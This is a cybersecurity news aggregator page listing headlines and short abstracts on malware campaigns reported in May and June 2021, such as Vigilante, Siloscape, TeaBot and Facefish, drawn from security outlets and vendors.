Experts uncovered an attack campaign that targets users of pirated software. The Vigilante malware blocks users' access to websites hosting pirated software. Users are requested to stay protected by avoiding the download of pirated software or clicking on links from unknown users.Cyware Alerts - Hacker News
June 22, 2021
NukeSped Copies Fileless Code From Bundlore, Leaves It Unused Full Text
Abstract
While investigating samples of NukeSped, a remote access trojan (RAT), Trend Micro came across several Bundlore adware samples using the same fileless routine that was spotted in NukeSped.Trend Micro
June 22, 2021
DroidMorph tool generates Android Malware Clones that Full Text
Abstract
Boffins developed a tool dubbed DroidMorph that provides morphing of Android applications (APKs) and allows to create Android apps (malware/benign) clones. A group of researchers from Adana Science and Technology University (Turkey) and the National...Security Affairs
June 21, 2021
Sload Targeting Europe Again Full Text
Abstract
Sload (aka Starslord loader) is one of the most dangerous types of malware in recent years. It usually functions as a downloader with an aim to assess the target and drop a more significant payload.Minerva Labs
June 19, 2021
Matanbuchus Loader: A New Malware-as-a-Service Full Text
Abstract
Researchers identified a threat actor targeting multiple organizations including large universities and high schools in the U.S., along with high-tech organizations in Belgium.Cyware Alerts - Hacker News
June 19, 2021
Vigilante malware stops victims from visiting piracy websites Full Text
Abstract
Sophos researchers uncovered a malware campaign that aims at blocking infected users’ from visiting a large number of websites dedicated to software piracy by modifying the HOSTS file on the infected system.Security Affairs
June 18, 2021
Vigilante malware stops victims from visiting piracy websites Full Text
Abstract
This strange malware stops you from visiting pirate websites Sophos researchers uncovered a malware campaign that aims at blocking infected users' from being able to visit a large number of piracy websites. Sophos researchers uncovered a malware...Security Affairs
June 18, 2021
Newly Discovered Vigilante Malware Rats Out Software Pirates and Blocks Them Full Text
Abstract
Vigilante, as SophosLabs Principal Researcher Andrew Brandt is calling the malware, gets installed when victims download and execute what they think is pirated software or games.Ars Technica
June 17, 2021
Matanbuchus: Malware-as-a-Service with Demonic Intentions Full Text
Abstract
Unit42 researchers found several organizations impacted by Matanbuchus including a large university and high school in the United States, as well as a high-tech organization in Belgium.Palo Alto Networks
June 17, 2021
Vigilante malware blocks victims from downloading pirated software Full Text
Abstract
A vigilante developer turns the tables on software pirates by distributing malware that prevents them from accessing pirated software sites in the future.BleepingComputer
June 17, 2021
Puzzling New Malware Blocks Access to Piracy Sites Full Text
Abstract
Newly discovered threat could be the work of an anti-piracy vigilanteInfosecurity Magazine
June 17, 2021
Researchers Uncover ‘Process Ghosting’ — A New Malware Evasion Technique Full Text
Abstract
Cybersecurity researchers have disclosed a new executable image tampering attack dubbed "Process Ghosting" that could be potentially abused by an attacker to circumvent protections and stealthily run malicious code on a Windows system. "With this technique, an attacker can write a piece of malware to disk in such a way that it's difficult to scan or delete it — and where it then executes the deleted malware as though it were a regular file on disk," Elastic Security researcher Gabriel Landau said . "This technique does not involve code injection, Process Hollowing, or Transactional NTFS (TxF)." Process Ghosting expands on previously documented endpoint bypass methods such as Process Doppelgänging and Process Herpaderping , thereby enabling the veiled execution of malicious code that may evade anti-malware defenses and detection. Process Doppelgänging, analogous to Process Hollowing , involves injecting arbitrary code in the address space ofThe Hacker News
June 16, 2021
DirtyMoe: Introduction and General Overview of Modularized Malware Full Text
Abstract
The aim of this malware is focused on Cryptojacking and DDoS attacks. DirtyMoe is run as a Windows service under system-level privileges via EternalBlue and at least three other exploits.Avast
June 16, 2021
Cyberium malware-hosting domain employed in multiple Mirai variants campaigns Full Text
Abstract
A new variant of the Mirai botnet, tracked as Moobot, was spotted scanning the Internet for vulnerable Tenda routers. Researchers from AT&T Alien Lab have spotted a new variant of the Mirai botnet, tracked asu Moobot, which was scanning the Internet...Security Affairs
June 15, 2021
TeaBot Trojan Spreads via Fake Antivirus Apps Full Text
Abstract
Malware actors increasingly luring victims under the pretense of popular apps and brands. A malware infection impersonating Kaspersky’s antivirus product for Android was launched attacks against its users via third-party app marketplaces.Cyware Alerts - Hacker News
June 15, 2021
Moobot Targeting Tenda Router Bugs for Distribution Full Text
Abstract
Underground malware domain Cyberium was spotted hosting an active Mirai variant to exploit an RCE in Tenda routers. Experts found several campaigns going back to as early as May 2020. It has been in action for the past year and appears to be still active.Cyware Alerts - Hacker News
June 15, 2021
Malicious PDFs Flood the Web, Lead to Password-Snarfing Full Text
Abstract
SolarMarker makers are using SEO poisoning, stuffing thousands of PDFs with tens of thousands of pages full of SEO keywords & links to redirect to the malware.Threatpost
June 14, 2021
SEO poisoning campaign aims at delivering RAT, Microsoft warns Full Text
Abstract
Microsoft spotted a series of attacks that use SEO poisoning to deliver a remote access trojan (RAT) used by threat actors to steal sensitive data. Microsoft is monitoring a wave of cyber attacks that leverages SEO poisoning to deliver a remote access...Security Affairs
June 14, 2021
Microsoft: SEO poisoning used to backdoor targets with malware Full Text
Abstract
Microsoft is tracking a series of attacks that use SEO poisoning to infect targets with a remote access trojan (RAT) capable of stealing the victims' sensitive info and backdooring their systems.BleepingComputer
June 14, 2021
Malware hosting domain Cyberium fanning out Mirai variants Full Text
Abstract
AT&T Alien Labs observed Moobot, a Mirai variant botnet, scanning for known but uncommon vulnerabilities in Tenda routers and also discovered a malware-hosting domain distributing few Mirai variants.AT&T Cybersecurity
June 10, 2021
Steam Gaming Platform Hosting Malware Full Text
Abstract
Emerging malware is lurking in Steam profile images.Threatpost
June 10, 2021
Victory Backdoor Targeting Southeast Asian Governments Full Text
Abstract
A surveillance operation by SharpPanda APT is active right now and targeting the Southeast Asian government. According to researchers, malware has been under development for the past three years. Additionally, attackers behind this campaign are using anti-analysis and anti-debugging techniques to i ... Read MoreCyware Alerts - Hacker News
June 10, 2021
SteamHide Malware Hides Inside Steam Profile Images Full Text
Abstract
Researchers found a new malware that relies on the Steam gaming platform for distributing its payload. It uses Steam profile images to evade detection.Cyware Alerts - Hacker News
June 9, 2021
Siloscape is Backdooring Clusters via Windows Containers Full Text
Abstract
For the first time, a new malware strain has been found targeting Windows containers to disrupt Kubernetes cloud environments. Named Siloscape, it opens a backdoor for all kinds of malicious activity without limiting itself to any particular infection goal. Kubernetes admins are recommended to ... Read MoreCyware Alerts - Hacker News
June 8, 2021
SteamHide: Hiding Malware in Plain Sight Full Text
Abstract
SteamHide abuses the gaming platform Steam to serve payloads for malware downloaders. Malware operators can also update already infected machines by adding new profile images to Steam.G-Data Security Blog
June 8, 2021
FreakOut Reloaded with New Exploits to Target its Victims Full Text
Abstract
FreakOut, the multi-platform Python-based malware that targets Windows and Linux devices, has been updated. The malware is now upgraded to worm its way into publicly exposed unpatched VMware servers.Cyware Alerts - Hacker News
June 8, 2021
SystemBC Malware Hides Behind Socks5 Proxy Full Text
Abstract
The injector used by the malware is also obfuscated with a compiler-based technique named control flow flattening, which modifies the normal flow of the program and makes static analysis impossible.Minerva Labs
June 8, 2021
Gootkit: the cautious Trojan Full Text
Abstract
Initially, it was distributed via spam and exploits kits such as Spelevo and RIG. Using spam campaigns, attackers later switched to compromised sites which trick victims into downloading the malware.Kaspersky Labs
June 7, 2021
Siloscape, first known malware that drops a backdoor into Kubernetes clusters Full Text
Abstract
Siloscape is a new strain of malware that targets Windows Server containers to execute code on the underlying node and spread in the Kubernetes cluster. Researchers from Palo Alto Networks have spotted a piece of malware that targets Windows Server...Security Affairs
June 7, 2021
Windows Container Malware Targets Kubernetes Clusters Full Text
Abstract
“Siloscape”, the first malware to target Windows containers, breaks out of Kubernetes clusters to plant backdoors and raid nodes for credentials.Threatpost
June 7, 2021
New Siloscape malware targets Windows containers and highlights security pitfalls Full Text
Abstract
Researchers at Palo Alto Unit 42 have discovered what they think is the first malware strain known to target Windows cloud containers. In new research unveiled June 7, senior security researcher Daniel Prizmant wrote that the malware, called Siloscape, attacks misconfigured Kubernetes clusters and allows for the creation of malicious containers that a threat actor…SCMagazine
June 07, 2021
New Kubernetes malware backdoors clusters via Windows containers Full Text
Abstract
New malware active for more than a year is compromising Windows containers to compromise Kubernetes clusters with the end goal of backdooring them and paving the way for attackers to abuse them in other malicious activities.BleepingComputer
June 07, 2021
Researchers Discover First Known Malware Targeting Windows Containers Full Text
Abstract
Security researchers have discovered the first known malware, dubbed " Siloscope ," targeting Windows Server containers to infect Kubernetes clusters in cloud environments. "Siloscape is heavily obfuscated malware targeting Kubernetes clusters through Windows containers," said Unit 42 researcher Daniel Prizmant. "Its main purpose is to open a backdoor into poorly configured Kubernetes clusters in order to run malicious containers such as, but not limited to, cryptojackers." Siloscape, first detected in March 2021, is characterized by several techniques, including targeting common cloud applications such as web servers to gain an initial foothold via known vulnerabilities, following which it leverages Windows container escape techniques to break out of the confines of the container and gain remote code execution on the underlying node. A container is an isolated, lightweight silo for running an application on the host operating system. The malware&The Hacker News
June 7, 2021
US Justice Department accuses Latvian national of deploying Trickbot malware Full Text
Abstract
The DoJ charged a Latvian woman for her alleged role in creating and deploying Trickbot, the computer banking trojan that has evolved to become a highly popular form of malware among cybercriminals.ZDNet
June 5, 2021
New Techniques Allow Malware to Bypass Antivirus Defenses Full Text
Abstract
Academics from two European universities devised Cut-and-Mouse and Ghost Control attack techniques that affect the protected folder feature offered by antivirus programs. Malware authors are continuously attempting to sneak past security defenses and the discovery of attack scenarios like these can ... Read MoreCyware Alerts - Hacker News
June 04, 2021
FreakOut malware worms its way into vulnerable VMware servers Full Text
Abstract
A multi-platform Python-based malware targeting Windows and Linux devices has now been upgraded to worm its way into Internet-exposed VMware vCenter servers unpatched against a remote code execution vulnerability.BleepingComputer
June 3, 2021
Google PPC Ads Used to Deliver Infostealers Full Text
Abstract
The crooks pay top dollar for Google search results for the popular AnyDesk, Dropbox & Telegram apps that lead to a malicious, infostealer-packed website.Threatpost
June 03, 2021
Google Chrome now warns you of extensions from untrusted devs Full Text
Abstract
Google has added new protection capabilities for Enhanced Safe Browsing users in Chrome, warning them when installing untrusted extensions and allowing them to request more in-depth scans of downloaded files.BleepingComputer
June 03, 2021
Necro Python Malware Upgrades With New Exploits and Crypto Mining Capabilities Full Text
Abstract
New upgrades have been made to a Python-based "self-replicating, polymorphic bot" called Necro in what's seen as an attempt to improve its chances of infecting vulnerable systems and evading detection. "Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command-and-control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel and SMB-based exploits that were not present in the earlier iterations of the code," researchers from Cisco Talos said in a deep-dive published today. Said to be in development as far back as 2015, Necro (aka N3Cr0m0rPh) targets both Linux and Windows devices, with heightened activity observed at the start of the year as part of a malware campaign dubbed " FreakOut " that was found exploiting vulnerabilities in network-attached storage (The Hacker News
June 3, 2021
Necro Python bot adds new exploits and Tezos mining to its bag of tricks Full Text
Abstract
Although the bot was first discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different C2 communications and the addition of new exploits for spreading.Cisco Talos
June 3, 2021
Mustang Panda Cyber Espionage Group Plants Malware Backdoor on Myanmar President’s Website Full Text
Abstract
A cyber-espionage hacking group is believed to have hacked the website of the Myanmar president’s office and planted a backdoor trojan inside a localized Myanmar font package.The Record
June 2, 2021
Threat Actors Use Mockups of Popular Apps to Spread Teabot and Flubot Malware on Android Full Text
Abstract
Bitdefender researchers have discovered a batch of new malicious Android applications that impersonate real ones from popular brands but with a twist to spread TeaBot and FluBot malware.Bitdefender
June 2, 2021
Poisoned Installers Discovered During Analysis of SolarWinds Hackers Toolkit Full Text
Abstract
The ongoing multi-vendor investigations into the SolarWinds mega-hack took another twist this week with the discovery of new malware artifacts that could be used in future supply chain attacks.Security Week
June 01, 2021
Malware Can Use This Trick to Bypass Ransomware Defense in Antivirus Solutions Full Text
Abstract
Researchers have disclosed significant security weaknesses in popular software applications that could be abused to deactivate their protections and take control of allow-listed applications to perform nefarious operations on behalf of the malware to defeat anti-ransomware defenses. The twin attacks, detailed by academics from the University of Luxembourg and the University of London, are aimed at circumventing the protected folder feature offered by antivirus programs to encrypt files (aka "Cut-and-Mouse") and disabling their real-time protection by simulating mouse "click" events (aka "Ghost Control"). "Antivirus software providers always offer high levels of security, and they are an essential element in the everyday struggle against criminals," said Prof. Gabriele Lenzini, chief scientist at the Interdisciplinary Center for Security, Reliability, and Trust at the University of Luxembourg. "But they are competing with criminals whiThe Hacker News
June 1, 2021
Russian hacker Pavel Sitnikov arrested for distributing malware via Telegram Full Text
Abstract
The popular Russian hacker Pavel Sitnikov was arrested by Russian authorities on charges of distributing malware via his Telegram channel. Pavel Sitnikov (@Flatl1ne), a prominent figure of the hacking underground, was arrested earlier this month by Russian...Security Affairs
June 1, 2021
Revisiting the NSIS-based crypter Full Text
Abstract
It is a free and powerful tool, making the distribution of software easier. Unfortunately, its qualities are known not only to legitimate developers but also to malware distributors.Malwarebytes Labs
May 31, 2021
Using Fake Reviews to Find Dangerous Extensions – Krebs on Security Full Text
Abstract
Leaving aside the extensions which are outright fraudulent, many legitimate extensions get abandoned or sold each year to shady marketers that it’s wise to only trust actively maintained extensions.Krebs on Security
May 31, 2021
Fake Streaming Service Spreads BazarLoader Full Text
Abstract
Scammers have noted how subscriptions to online streaming services during the COVID-19 pandemic have skyrocketed. Proofpoint researchers expose a malspam campaign using a fake movie streaming service called BravoMovies.Cyware Alerts - Hacker News
May 31, 2021
Agrius Masquerades as Ransomware in Attacks Against Israel Full Text
Abstract
Experts stumbled across a new threat actor that utilizes data-wiping malware to disrupt its victims’ IT infrastructure and demand a ransom posing as ransomware actors. In addition, it is focusing its attacks on a variety of organizations based in the Middle East.Cyware Alerts - Hacker News
May 30, 2021
Facefish Backdoor delivers rootkits to Linux x64 systems Full Text
Abstract
Qihoo 360 NETLAB spotted a new backdoor dubbed Facefish that could allow attackers to take over Linux systems and steal sensitive data. Cybersecurity experts from Qihoo 360 NETLAB published details about a new backdoor, dubbed Facefish, which can be used...Security Affairs
May 29, 2021
Secure Search is a Browser Hijacker – How to Remove it Now? Full Text
Abstract
Secured Search is a browser hijacker that changes your browser's settings to promote securedsearch.com, let's remove it. Secured Search is the same piece of software as ByteFence Secure Browsing. It's supposedly a tool that improves browsing security...Security Affairs
May 28, 2021
Chinese cyberspies are targeting US, EU orgs with new malware Full Text
Abstract
Chinese threat groups continue to deploy new malware strains on the compromised network of dozens of US and EU organizations after exploiting vulnerable Pulse Secure VPN appliances.BleepingComputer
May 28, 2021
Researchers Warn of Facefish Backdoor Spreading Linux Rootkits Full Text
Abstract
Cybersecurity researchers have disclosed a new backdoor program capable of stealing user login credentials, device information and executing arbitrary commands on Linux systems. The malware dropper has been dubbed " Facefish " by Qihoo 360 NETLAB team owing its capabilities to deliver different rootkits at different times and the use of Blowfish cipher to encrypt communications to the attacker-controlled server. "Facefish consists of 2 parts, Dropper and Rootkit, and its main function is determined by the Rootkit module, which works at the Ring 3 layer and is loaded using the LD_PRELOAD feature to steal user login credentials by hooking ssh/sshd program related functions, and it also supports some backdoor functions," the researchers said . The NETLAB research builds on a previous analysis published by Juniper Networks on April 26, which documented an attack chain targeting Control Web Panel (CWP, formerly CentOS Web Panel) to inject an SSH implant witThe Hacker News
May 27, 2021
Malvertising Campaign On Google Distributed Trojanized AnyDesk Installer Full Text
Abstract
Cybersecurity researchers on Wednesday publicized the disruption of a "clever" malvertising network targeting AnyDesk that delivered a weaponized installer of the remote desktop software via rogue Google ads that appeared in the search engine results pages. The campaign, which is believed to have begun as early as April 21, 2021, involves a malicious file that masquerades as a setup executable for AnyDesk (AnyDeskSetup.exe), which, upon execution, downloads a PowerShell implant to amass and exfiltrate system information. "The script had some obfuscation and multiple functions that resembled an implant as well as a hardcoded domain (zoomstatistic[.]com) to 'POST' reconnaissance information such as user name, hostname, operating system, IP address and the current process name," researchers from Crowdstrike said in an analysis. AnyDesk's remote desktop access solution has been downloaded by more than 300 million users worldwide, according to the coThe Hacker News
May 27, 2021
Targeted AnyDesk Ads on Google Served Up Weaponized App Full Text
Abstract
Malicious ad campaign was able to rank higher in searches than legitimate AnyDesk ads.Threatpost
May 27, 2021
Melting Ice - Tracking IcedID Servers with a few simple steps Full Text
Abstract
This threat has constantly been growing in the past year and boasts a wide range of malicious capabilities such as browser hooking, credential theft, MiTM proxy setup, and a VNC module, among others.Check Point Research
May 26, 2021
Data Wiper Malware Disguised As Ransomware Targets Israeli Entities Full Text
Abstract
Researchers on Tuesday disclosed a new espionage campaign that resorts to destructive data-wiping attacks targeting Israeli entities at least since December 2020 that camouflage the malicious activity as ransomware extortions. Cybersecurity firm SentinelOne attributed the attacks to a nation-state actor affiliated with Iran it tracks under the moniker "Agrius." "An analysis of what at first sight appeared to be a ransomware attack revealed new variants of wipers that were deployed in a set of destructive attacks against Israeli targets," the researchers said . "The operators behind the attacks intentionally masked their activity as ransomware attacks, an uncommon behavior for financially motivated groups." The group's modus operandi involves deploying a custom .NET malware called Apostle that has evolved to become fully functional ransomware, supplanting its prior wiper capabilities, while some of the attacks have been carried out using a secondThe Hacker News
May 26, 2021
Malware used zero-day exploit to take screenshots of victims’ Macs Full Text
Abstract
The TCC bypass exploit could have allowed attackers to create ransomware that encrypts protected system files and folders without user knowledge.SCMagazine
May 26, 2021
SolarMarker Backdoor Pretends to be Legit PDFescape Installer Full Text
Abstract
The SolarMarker backdoor pretends to be a legit PDFescape installer. It creates an encoded file and then executes a Power Shell Script command to decode and execute the malicious script.Cyren
May 25, 2021
STRRAT - The RAT that Wants to be a Ransomware Full Text
Abstract
Microsoft is warning against a malware campaign by STRRAT, a RAT first spotted in June 2020. It camouflages as ransomware and supports various features such as logging keystrokes, collecting browser passwords, and running remote commands and PowerShell. Organizations should stay alert and offer tra ... Read MoreCyware Alerts - Hacker News
May 24, 2021
MountLocker Using Windows API to Spread as Worm Full Text
Abstract
Experts identified a cybercriminal group called XingLocker that uses a customized MountLocker ransomware version. The latter was spotted using enterprise Windows Active Directory APIs to worm through networks.Cyware Alerts - Hacker News
May 23, 2021
A malware attack hit the Alaska Health Department Full Text
Abstract
The Alaska health department website was forced offline by a malware attack, officials are investigating the incident. The website of the Alaska health department was forced offline this week by a malware attack. Local authorities launched an investigation...Security Affairs
May 22, 2021
Bizarro banking malware targets 70 banks in Europe and South America Full Text
Abstract
A banking trojan named Bizarro that originates from Brazil has crossed the borders and started to target customers of 70 banks in Europe and South America.BleepingComputer
May 21, 2021
Security Flaws in Stalkerware Apps are a Growing Danger Full Text
Abstract
Security analysts at ESET identified 158 privacy and security issues in 58 Android stalkerware apps that could lead to account and device hijacking, data manipulation, and remote code execution, among others.Cyware Alerts - Hacker News
May 21, 2021
Microsoft Warns of Data Stealing Malware That Pretends to Be Ransomware Full Text
Abstract
Microsoft on Thursday warned of a "massive email campaign" that's pushing a Java-based STRRAT malware to steal confidential data from infected systems while disguising itself as a ransomware infection. "This RAT is infamous for its ransomware-like behavior of appending the file name extension .crimson to files without actually encrypting them," the Microsoft Security Intelligence team said in a series of tweets. The new wave of attacks, which the company spotted last week, commences with spam emails sent from compromised email accounts with "Outgoing Payments" in the subject line, luring the recipients into opening malicious PDF documents that claim to be remittances, but in reality, connect to a rogue domain to download the STRRAT malware. Besides establishing connections to a command-and-control server during execution, the malware comes with a range of features that allow it to collect browser passwords, log keystrokes, and run remote commandThe Hacker News
May 20, 2021
AHK Rat Loader Delivers Multiple RATs Full Text
Abstract
A malware campaign that has been undergoing constant development in its toolsets since February now boasts of four different malware versions - all of which start with an AHK executable that leads to the different VBScripts.Cyware Alerts - Hacker News
May 20, 2021
STRRAT RAT spreads masquerading as ransomware Full Text
Abstract
Microsoft warns of a malware campaign that is spreading a RAT dubbed named STRRAT masquerading as ransomware. Microsoft Security Intelligence researchers uncovered a malware campaign that is spreading a remote access trojan (RAT) tracked as STRRAT....Security Affairs
May 20, 2021
Apple Exec Calls Level of Mac Malware ‘Unacceptable’ Full Text
Abstract
Company is using threat of attacks as defense in case brought against it by Epic Games after Fortnite was booted from the App Store for trying to circumvent developer fees.Threatpost
May 20, 2021
Fake Microsoft Authenticator extension discovered in Chrome Store Full Text
Abstract
According to the report, the fake Microsoft Authenticator extension was made available on April 23 this year after failing to be spotted by Google’s security systems and has reached 448 users.Bitdefender
May 20, 2021
BazarCall: Call Centers Help Spread BazarLoader Malware Full Text
Abstract
In February, researchers began reporting a call center-based method of distributing BazarLoader. It utilizes trial subscription-themed emails that encourages potential victims to call a phone number.Palo Alto Networks
May 19, 2021
Bizarro Trojan: Fiercely Stealing Banking Information Full Text
Abstract
A new banking trojan, that can harvest bank account logins from Android mobile users, is now spreading quickly in multiple regions. B anking customers are recommended to stay vigilant.Cyware Alerts - Hacker News
May 19, 2021
TeamTNT’s Extended Credential Harvester Targets Cloud Services, Other Software Full Text
Abstract
The cybercriminal group TeamTNT is no stranger to targeting cloud containers, expanding their arsenal to steal cloud credentials, and exploring other environments and intrusive activities.Trend Micro
May 19, 2021
New WastedLoader Campaign Delivered Through RIG Exploit Kit Full Text
Abstract
In February 2021, Bitdefender researchers identified a new RIG Exploit Kit campaign exploiting two scripting engine vulnerabilities in unpatched Internet Explorer browsers.Bitdefender
May 18, 2021
Stalkerware Apps Riddled with Security Bugs Full Text
Abstract
Attackers can take advantage of the fact these apps access, gather, store and transmit more information than any other app their victims have installed.Threatpost
May 18, 2021
Bizarro banking Trojan targets banks in Brazil and abroad Full Text
Abstract
Bizarro is a new sophisticated Brazilian banking trojan that is targeting customers of tens of banks in Europe and South America. Researchers from Kaspersky have spotted a new sophisticated Brazilian banking trojan dubbed Bizarro that is targeting...Security Affairs
May 18, 2021
Magecart Hackers Spreading Malicious PHP Web Shells Full Text
Abstract
A Magecart Group continues to distribute new malware wherein attackers hide the PHP-based web shell malware—masked as a favicon—into the targeted sites. The cybercrime syndicate is intensifying its efforts to compromise online stores with a wide range of attack vectors.Cyware Alerts - Hacker News
May 17, 2021
Android stalkerware, a danger for victims and stalkers Full Text
Abstract
ESET research shows that Android stalkerware apps are affected by vulnerabilities that further threaten victims. ESET research reveals that common Android stalkerware apps are affected with vulnerabilities that could expose the privacy and security...Security Affairs
May 17, 2021
Bizarro Banking Trojan Sports Sophisticated Backdoor Full Text
Abstract
The advanced Brazilian malware has gone global, harvesting bank logins from Android mobile users.Threatpost
May 17, 2021
Experts Warn About Ongoing AutoHotkey-Based Malware Attacks Full Text
Abstract
Cybersecurity researchers have uncovered an ongoing malware campaign that heavily relies on AutoHotkey (AHK) scripting language to deliver multiple remote access trojans (RAT) such as Revenge RAT, LimeRAT, AsyncRAT, Houdini, and Vjw0rm on target Windows systems. At least four different versions of the campaign have been spotted starting February 2021, according to researchers from Morphisec Labs. "The RAT delivery campaign starts from an AutoHotKey (AHK) compiled script," the researchers noted . "This is a standalone executable that contains the following: the AHK interpreter, the AHK script, and any files it has incorporated via the FileInstall command. In this campaign, the attackers incorporate malicious scripts/executables alongside a legitimate application to disguise their intentions." AutoHotkey is an open-source custom scripting language for Microsoft Windows that's meant to provide easy hotkeys for macro-creation and software automation, enablinThe Hacker News
May 17, 2021
Clark County confirms malware shut down computer servers Full Text
Abstract
The county’s 911 system remained working amid the incident. Elements of the county’s server are gradually coming back online. However, county officials say the process is still ongoing.Springfield News-Sun
May 16, 2021
MSBuild tool used to deliver RATs filelessly Full Text
Abstract
Hackers abuses Microsoft Build Engine (MSBuild) to filelessly deliver malware on targeted Windows systems, including RAT and password-stealer. Researchers from Anomali observed threat actors abusing Microsoft Build Engine (MSBuild) to filelessly deliver...Security Affairs
May 14, 2021
Hackers Using Microsoft Build Engine to Deliver Malware Filelessly Full Text
Abstract
Threat actors are abusing Microsoft Build Engine (MSBuild) to filelessly deliver remote access trojans and password-stealing malware on targeted Windows systems. The actively ongoing campaign is said to have emerged last month, researchers from cybersecurity firm Anomali said on Thursday, adding the malicious build files came embedded with encoded executables and shellcode that deploy backdoors , allowing the adversaries to take control of the victims' machines and steal sensitive information. MSBuild is an open-source build tool for .NET and Visual Studio developed by Microsoft that allows for compiling source code, packaging, testing, deploying applications. In using MSBuild to filelessly compromise a machine, the idea is to stay under the radar and thwart detection, as such malware makes use of a legitimate application to load the attack code into memory, thereby leaving no traces of infection on the system and giving attackers a high level of stealth. As of writing, oThe Hacker News
May 14, 2021
RevengeRAT and AysncRAT target aerospace and travel sectors Full Text
Abstract
a campaign of remote access trojans is targeting the aerospace and travel industries with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AysncRAT.SCMagazine
May 14, 2021
FIN7 Backdoor Masquerades as Ethical Hacking Tool Full Text
Abstract
The financially motivated cybercrime gang behind the Carbanak RAT is back with the Lizar malware, which can harvest all kinds of info from Windows machines.Threatpost
May 14, 2021
Microsoft Alerts Aviation and Travel Firms to RAT Campaign Full Text
Abstract
Sophisticated crypter-as-a-service ultimately leads to data theftInfosecurity Magazine
May 14, 2021
Snip3 Crypter Service Delivers Multiple RAT Families Full Text
Abstract
Researchers have recently monitored a highly sophisticated Crypter-as-a-Service that delivers multiple RAT families onto target machines through phishing emails. Besides, it has the ability to distinguish sandboxing and virtual environments and deliver malware accordingly.Cyware Alerts - Hacker News
May 13, 2021
Fresh Loader Targets Aviation Victims with Spy RATs Full Text
Abstract
The campaign is harvesting screenshots, keystrokes, credentials, webcam feeds, browser and clipboard data and more, with RevengeRAT or AsyncRAT payloads.Threatpost
May 13, 2021
Microsoft build tool abused to deliver password-stealing malware Full Text
Abstract
Threat actors are abusing the Microsoft Build Engine (MSBuild) to deploy remote access tools and information-stealing malware filelessly as part of an ongoing campaign.BleepingComputer
May 12, 2021
Lemon Duck Cryptominer has Made a Comeback Full Text
Abstract
Microsoft Exchange servers are once again under attack by the Lemon Duck cryptocurrency mining botnet, which recently beefed up its anti-detection capabilities. Organizations should stay vigilant against this threat and use reliable anti-malware defenses.Cyware Alerts - Hacker News
May 12, 2021
A Triple Combo of DoubleDrop, DoubleDrag, and DoubleBack Malware Full Text
Abstract
Three new malware DOUBLEDRAG, DOUBLEDROP, and DOUBLEBACK, associated with a massive cyberespionage campaign, have been targeting several organizations in the U.S. The related phishing attacks were carried out by a new financially motivated threat actor group dubbed UNC2529.Cyware Alerts - Hacker News
May 12, 2021
21Nails Exim Bugs and Remote Code Execution: Beware Full Text
Abstract
The Qualys Research Team found 10 remotely exploitable and 11 locally security flaws, collectively known as 21Nails. Versions prior to Exim 4.94.2 are vulnerable to attacks exploiting 21Nails.Cyware Alerts - Hacker News
May 12, 2021
Microsoft: Threat actors target aviation orgs with new malware Full Text
Abstract
Microsoft warns of an ongoing spear-phishing campaign targeting aerospace and travel organizations with multiple remote access trojans (RATs) deployed using a new and stealthy malware loader.BleepingComputer
May 12, 2021
TeaBot Android banking Trojan targets banks in Europe Full Text
Abstract
Malware researchers from Cleafy warn of a new Android banking trojan dubbed TeaBot (aka Anatsa) that is targeting banks in Europe. Malware experts from the Italian cybersecurity firm Cleafy have spotted a new Android banking trojan dubbed TeaBot (aka...Security Affairs
May 12, 2021
TeaBot Trojan Targets Banks via Hijacked Android Handsets Full Text
Abstract
Malware first observed in Italy can steal victims’ credentials and SMS messages as well as livestream device screens on demand.Threatpost
May 11, 2021
Fake Chrome App Anchors Rapidly Worming ‘Smish’ Cyberattack Full Text
Abstract
An ingenious attack on Android devices self-propagates, with the potential for a range of damage.Threatpost
May 11, 2021
Apple was aware that XcodeGhost impacted 128 Million iOS Users in 2015 Full Text
Abstract
Court documents revealed that the infamous XcodeGhost malware, which has been active since 2015, infected 128 million iOS users. Documents provided in a court case that sees Epic Games v. Apple Inc. revealed that the XcodeGhost malware impacted...Security Affairs
May 11, 2021
Experts warn of a new Android banking trojan stealing users’ credentials Full Text
Abstract
Cybersecurity researchers on Monday disclosed a new Android trojan that hijacks users' credentials and SMS messages to facilitate fraudulent activities against banks in Spain, Germany, Italy, Belgium, and the Netherlands. Called " TeaBot " (or Anatsa), the malware is said to be in its early stages of development, with malicious attacks targeting financial apps commencing in late March 2021, followed by a rash of infections in the first week of May against Belgium and Netherlands banks. The first signs of TeaBot activity emerged in January. "The main goal of TeaBot is stealing victim's credentials and SMS messages for enabling frauds scenarios against a predefined list of banks," Italian cybersecurity, and online fraud prevention firm Cleafy said in a Monday write-up. "Once TeaBot is successfully installed in the victim's device, attackers can obtain a live streaming of the device screen (on demand) and also interact with it via Accessibility SerThe Hacker News
May 7, 2021
Panda Stealer: Spreading via Spam Emails and Discord Full Text
Abstract
Panda Stealer, a new cryptocurrency variant, has been found spreading through a global spam campaign and potentially through Discord channels. It is targeting individuals across U.S., Australia, Japan, and Germany.Cyware Alerts - Hacker News
May 7, 2021
Buer malware rewritten in Rust language to curb detection Full Text
Abstract
Researchers said that the last few years saw malware authors adopting newer coding languages at a more rapid pace.SCMagazine
May 7, 2021
New Moriya Rootkit Used in the Wild to Backdoor Windows Systems Full Text
Abstract
Moriya rootkit is used by an unknown actor to deploy passive backdoors on public-facing servers, facilitating the creation of a covert C2 communication channel through which they can be controlled.Kaspersky Labs
May 7, 2021
Researchers use PyInstaller to create stealth malware Full Text
Abstract
Instead of obfuscating code and creating an untraceable malware packer from scratch, cybercriminals could take advantage of PyInstaller to create packers that are not caught in scans.Tech Target
May 07, 2021
New Stealthy Rootkit Infiltrated Networks of High-Profile Organizations Full Text
Abstract
An unknown threat actor with the capabilities to evolve and tailor its toolset to target environments infiltrated high-profile organizations in Asia and Africa with an evasive Windows rootkit since at least 2018. Called 'Moriya ,' the malware is a "passive backdoor which allows attackers to inspect all incoming traffic to the infected machine, filter out packets that are marked as designated for the malware and respond to them," said Kaspersky researchers Mark Lechtik and Giampaolo Dedola in a Thursday deep-dive. The Russian cybersecurity firm termed the ongoing espionage campaign 'TunnelSnake .' Based on telemetry analysis, less than 10 victims around the world have been targeted to date, with the most prominent victims being two large diplomatic entities in Southeast Asia and Africa. All the other victims were located in South Asia. The first reports of Moriya emerged last November when Kaspersky said it discovered the stealthy implant in the networksThe Hacker News
May 6, 2021
Pingback Malware Using ICMP for Covert Communication Full Text
Abstract
